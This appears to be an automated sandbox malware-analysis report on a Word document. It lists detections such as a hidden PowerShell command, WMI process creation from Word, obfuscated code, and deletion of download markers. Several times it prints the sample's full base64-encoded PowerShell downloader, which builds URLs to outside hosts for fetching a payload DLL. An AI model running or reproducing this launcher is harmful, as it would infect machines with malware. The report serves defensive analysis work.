rACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA

PowerShell case anomaly found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_1000C620

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
